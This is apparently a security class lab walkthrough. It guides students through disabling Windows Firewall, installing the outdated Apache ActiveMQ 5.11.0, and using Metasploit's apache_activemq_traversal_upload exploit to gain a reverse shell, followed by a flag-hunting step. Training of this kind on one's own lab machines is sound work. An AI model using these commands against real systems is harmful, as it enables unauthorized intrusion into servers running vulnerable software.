H 310: Metasploit v. ActiveMQ (20 pts)

What you need

Purpose

To practice using Metasploit to exploit a vulnerable Windows application.

Task 1: Preparing the Windows Target

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.

Type FIREWALL.

In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Installing Java

On your Windows system, in Firefox, go to
https://java.com
Click the red "Java Download" button. Download and install the recommended version. When I did it on May 21, 2020, it was "jre-8u251-windows-x64".

Installing Apache ActiveMQ v5.11.0

This is an old server product with known vulnerabilities. We'll run it, and see how using old software can endanger a modern operating system.

On your Windows system, in Firefox, go to:

https://activemq.apache.org/activemq-5110-release
Download the apache-activemq-5.11.0-bin.zip file, as shown below.

Open your Downloads folder. Right-click the apache-activemq-5.11.0-bin.zip file and click "Extract All..", Extract.

An "apache-activemq-5.11.0-bin" window opens. From its menu bar, click File, "Open Command Prompt".

Starting ActiveMQ

In the Command Prompt window, execute these commands:
cd apache-activemq-5.11.0
bin\activemq.bat start
ActiveMQ starts, showing "ActiveMQ WebConsole available at http://0.0.0.0:8161/" as shown below.


Task 2: Preparing the Debian Server

Installing Metasploit

In an SSH session to your Debian server, execute these commands:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Metasploit installs, as shown below.

Installing Nmap

Execute this command:
sudo apt install nmap 
Enter y to install the package.

Nmap installs, as shown below.

Testing the Target Server

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.
sudo nmap -sV -p8161 192.168.100.2
You should see the port open, as shown below.


Task 3: Exploiting the Windows Target

Finding a Metasploit Exploit

On your Debian server, execute this command:
msfconsole -q
It asks if you want to setup a database. Reply no.

At the msf5 > prompt, execute this command:

search activemq
A list of exploits appears, as shown below.

Notice that one of them clearly claims to work on version 5.11, outlined in yellow in the image below.

Selecting Options and Target

At the msf5 > prompt, execute these commands:
use exploit/windows/http/apache_activemq_traversal_upload
show options
The options required for this exploit are listed. The required options are RHOSTS and LHOST, as shown below,

At the metasploit prompt, execute these commands, using the correct IP addresses for your Windows and Linux systems, respectively:

set RHOSTS 192.168.100.3
set LHOST 192.168.100.1
exploit
You get a shell, as shown below. Press Enter to see a Windows prompt.

H 310.1: Java Module (20 pts)

In the shell, execute this command:
tasklist /m java*
Find the Module name, which is covered by a green box in the image below. That's the flag.

Posted 5-21-2020
Flag number fixed 8-4-20